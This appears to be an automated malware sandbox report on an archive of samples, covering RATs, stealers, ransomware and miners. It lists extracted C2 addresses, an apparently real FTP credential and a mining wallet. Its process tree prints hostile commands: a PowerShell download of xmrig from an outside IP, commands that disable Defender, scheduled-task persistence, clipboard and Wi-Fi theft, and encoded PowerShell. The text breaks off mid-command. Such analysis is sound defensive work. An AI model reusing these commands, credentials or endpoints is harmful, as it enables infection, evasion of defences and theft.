Resubmissions

31-12-2024 21:35

241231-1fmqnszqft 10

31-12-2024 21:27

241231-1axzfssnek 10

16-12-2024 05:27

241216-f5kx6awmh1 10

14-12-2024 20:23

241214-y6jqlasrhy 10

14-12-2024 20:22

241214-y51bysvmbk 10

14-12-2024 20:13

241214-yzc98svkfr 10

14-12-2024 13:14

241214-qgw1masrcy 10

14-12-2024 13:12

241214-qfk7qsvlaq 3

12-12-2024 18:19

241212-wymq6ssnat 10

Analysis

  • max time kernel
    299s
  • max time network
    337s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-12-2024 21:35

General

  • Target

    241127-xqsswsslej_pw_infected.zip

  • Size

    12KB

  • MD5

    79fd058f7d06cc022de1786507eb26e3

  • SHA1

    86590ec8ed73fd2951587561dff5387e9e0e18e6

  • SHA256

    cf99eaaa334a9c8ffc2fe0e1068ffcc02dda1dd8b2b0eab2821182c5d2c1f51d

  • SHA512

    8316ac3782c05a3ebea4ca0868e33512e5ef29b251498f3af5ab261cd2010dec6b0eca8a57adcadb0d70653be2e22c0c2c137c7a38ec7b3d5ebbdd02e09c0227

  • SSDEEP

    384:sBfwcSEp9ZjKXSBIDv4dDfjlMJ7HWTHWT:wfACW6Dr8HWTHWT

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    ftpcluster.loopia.se
  • Port:
    21
  • Username:
    srbreferee.com
  • Password:
    luka2005

Extracted

Family

quasar

Version

1.4.1

Botnet

Helper Atanka

C2

193.203.238.136:8080

Mutex

14f39659-ca5b-4af7-8045-bed3500c385f

Attributes
  • encryption_key

    11049F2AEBDCF8E3A57474CD5FBA40FB2FFC5424

  • install_name

    diskutil.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    diskutil

  • subdirectory

    diskutil

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

6.tcp.eu.ngrok.io:12925

Mutex

hDtjdONRXVCh

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

remcos

Botnet

RemoteHost

C2

192.210.150.26:8787

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-R1T905

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Extracted

Family

xworm

C2

127.0.0.1:48990

147.185.221.22:48990

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    svchost.exe

Extracted

Family

quasar

Version

1.4.1

Botnet

Manager

C2

serveo.net:11453

Mutex

a851cc5b-e50f-4270-9929-06c6323cdb3d

Attributes
  • encryption_key

    5A3C537E5FB2739D5B2468FC37915D58EF4AC5EA

  • install_name

    Runtime broker.exe

  • log_directory

    Microsoftsessential

  • reconnect_delay

    3000

  • startup_key

    Runtime broker

  • subdirectory

    Microsoft_Essentials

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Detect Vidar Stealer 3 IoCs
  • Detect Xworm Payload 2 IoCs
  • Jigsaw Ransomware

    Ransomware family first created in 2016. Named based on wallpaper set after infection in the early versions.

  • Jigsaw family
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 4 IoCs
  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • XMRig Miner payload 6 IoCs
  • Xmrig family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Async RAT payload 2 IoCs
  • Renames multiple (3767) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Deletes itself 1 IoCs
  • Drops startup file 4 IoCs
  • Executes dropped EXE 34 IoCs
  • Loads dropped DLL 32 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Adds Run key to start application 2 TTPs 14 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Drops autorun.inf file 1 TTPs 5 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 38 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 26 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies Control Panel 26 IoCs
  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 4 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\241127-xqsswsslej_pw_infected.zip"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2344
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
    1⤵
      PID:4456
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:1068
      • C:\Windows\system32\rundll32.exe
        "C:\Windows\system32\rundll32.exe" C:\Windows\system32\themecpl.dll,OpenThemeAction C:\Windows\Resources\Themes\Light.theme
        1⤵
        • Modifies Control Panel
        PID:388
      • C:\Program Files\7-Zip\7zG.exe
        "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\" -spe -an -ai#7zMap8602:140:7zEvent4135
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:3688
      • C:\Program Files\7-Zip\7zG.exe
        "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\*\" -spe -an -ai#7zMap2673:384:7zEvent2759
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:224
      • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe
        "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\New Text Document mod.exe"
        1⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2828
        • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\xmrig.exe
          "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\xmrig.exe"
          2⤵
          • Executes dropped EXE
          PID:228
        • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Bootxr.exe
          "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Bootxr.exe"
          2⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1492
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR"
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:988
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR"
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2824
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c powershell Invoke-WebRequest -Uri http://45.125.67.168/stelin/xmrig.exe -Outfile C:\WinXRAR\xmrig.exe
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4632
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell Invoke-WebRequest -Uri http://45.125.67.168/stelin/xmrig.exe -Outfile C:\WinXRAR\xmrig.exe
              4⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3168
          • C:\WinXRAR\xmrig.exe
            C:\WinXRAR\xmrig.exe -o xmr-us-east1.nanopool.org:14444 -u 47n193Tag3FHULdsD1HYmYGPdfCpquhdci1Rq2L4gR4U5Diq8oX6ny73xRqb4DwWYBTuQQF3Xa36AQFNjCCX71nAMeYiG4t -p x --algo rx/0
            3⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            PID:3080
        • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\.exe
          "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\.exe"
          2⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:376
        • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\diskutil.exe
          "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\diskutil.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1184
          • C:\Windows\SYSTEM32\schtasks.exe
            "schtasks" /create /tn "diskutil" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe" /rl HIGHEST /f
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2640
          • C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe
            "C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe"
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2052
            • C:\Windows\SYSTEM32\schtasks.exe
              "schtasks" /create /tn "diskutil" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe" /rl HIGHEST /f
              4⤵
              • Scheduled Task/Job: Scheduled Task
              PID:2816
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\a0PU4Q6DFljY.bat" "
              4⤵
                PID:5816
                • C:\Windows\system32\chcp.com
                  chcp 65001
                  5⤵
                    PID:6004
                  • C:\Windows\system32\PING.EXE
                    ping -n 10 localhost
                    5⤵
                    • System Network Configuration Discovery: Internet Connection Discovery
                    • Runs ping.exe
                    PID:5536
                  • C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe
                    "C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of SetWindowsHookEx
                    PID:3980
                    • C:\Windows\SYSTEM32\schtasks.exe
                      "schtasks" /create /tn "diskutil" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe" /rl HIGHEST /f
                      6⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:4644
            • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\systempreter.exe
              "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\systempreter.exe"
              2⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:3192
            • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ghjaedjgaw.exe
              "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ghjaedjgaw.exe"
              2⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:4468
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ghjaedjgaw.exe" & rd /s /q "C:\ProgramData\KN7900ZMYUSR" & exit
                3⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3008
                • C:\Windows\SysWOW64\timeout.exe
                  timeout /t 10
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Delays execution with timeout.exe
                  PID:3816
            • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\uncrypted.exe
              "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\uncrypted.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:5604
              • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\uncrypted.exe
                "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\uncrypted.exe"
                3⤵
                • Executes dropped EXE
                PID:5236
              • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\uncrypted.exe
                "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\uncrypted.exe"
                3⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: MapViewOfSection
                PID:5188
                • C:\Windows\explorer.exe
                  "C:\Windows\explorer.exe"
                  4⤵
                  • Suspicious behavior: MapViewOfSection
                  PID:6108
                  • C:\Windows\EXPLORER.EXE
                    C:\Windows\EXPLORER.EXE {2046C745-B848-47EE-8068-B039EAC15A1C}
                    5⤵
                      PID:5844
              • C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\microsoft-onedrive.exe
                "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\microsoft-onedrive.exe"
                2⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:4980
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcABiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAYwBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAZwBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAdwB5ACMAPgA="
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:5868
                • C:\Users\Admin\AppData\Local\Temp\Built.exe
                  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
                  3⤵
                  • Executes dropped EXE
                  PID:2136
                  • C:\Users\Admin\AppData\Local\Temp\Built.exe
                    "C:\Users\Admin\AppData\Local\Temp\Built.exe"
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:1564
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
                      5⤵
                        PID:5952
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
                          6⤵
                          • Command and Scripting Interpreter: PowerShell
                          PID:3932
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        5⤵
                          PID:5936
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                            6⤵
                            • Command and Scripting Interpreter: PowerShell
                            PID:5132
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                          5⤵
                            PID:1176
                            • C:\Windows\system32\tasklist.exe
                              tasklist /FO LIST
                              6⤵
                              • Enumerates processes with tasklist
                              PID:4296
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                            5⤵
                              PID:3772
                              • C:\Windows\System32\Wbem\WMIC.exe
                                wmic csproduct get uuid
                                6⤵
                                  PID:5832
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                5⤵
                                  PID:3560
                                  • C:\Windows\system32\reg.exe
                                    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                    6⤵
                                      PID:5916
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                    5⤵
                                      PID:4452
                                      • C:\Windows\system32\reg.exe
                                        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                        6⤵
                                          PID:5304
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                        5⤵
                                          PID:5544
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic path win32_VideoController get name
                                            6⤵
                                            • Detects videocard installed
                                            PID:468
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                          5⤵
                                            PID:1308
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic path win32_VideoController get name
                                              6⤵
                                              • Detects videocard installed
                                              PID:3136
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""
                                            5⤵
                                            • Hide Artifacts: Hidden Files and Directories
                                            PID:3908
                                            • C:\Windows\system32\attrib.exe
                                              attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"
                                              6⤵
                                              • Views/modifies file attributes
                                              PID:6060
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‎‌ .scr'"
                                            5⤵
                                              PID:2172
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‎‌ .scr'
                                                6⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                PID:4868
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                              5⤵
                                                PID:860
                                                • C:\Windows\system32\tasklist.exe
                                                  tasklist /FO LIST
                                                  6⤵
                                                  • Enumerates processes with tasklist
                                                  PID:4076
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                5⤵
                                                  PID:4944
                                                  • C:\Windows\system32\tasklist.exe
                                                    tasklist /FO LIST
                                                    6⤵
                                                    • Enumerates processes with tasklist
                                                    PID:872
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                  5⤵
                                                    PID:1372
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                    5⤵
                                                    • Clipboard Data
                                                    PID:5712
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell Get-Clipboard
                                                      6⤵
                                                      • Clipboard Data
                                                      PID:2332
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                    5⤵
                                                      PID:3920
                                                      • C:\Windows\system32\tasklist.exe
                                                        tasklist /FO LIST
                                                        6⤵
                                                        • Enumerates processes with tasklist
                                                        PID:4220
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      5⤵
                                                        PID:2596
                                                        • C:\Windows\system32\tree.com
                                                          tree /A /F
                                                          6⤵
                                                            PID:2924
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                          5⤵
                                                          • System Network Configuration Discovery: Wi-Fi Discovery
                                                          PID:5956
                                                          • C:\Windows\system32\netsh.exe
                                                            netsh wlan show profile
                                                            6⤵
                                                            • System Network Configuration Discovery: Wi-Fi Discovery
                                                            PID:3176
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "systeminfo"
                                                          5⤵
                                                            PID:4676
                                                            • C:\Windows\system32\systeminfo.exe
                                                              systeminfo
                                                              6⤵
                                                              • Gathers system information
                                                              PID:2736
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                            5⤵
                                                              PID:400
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAA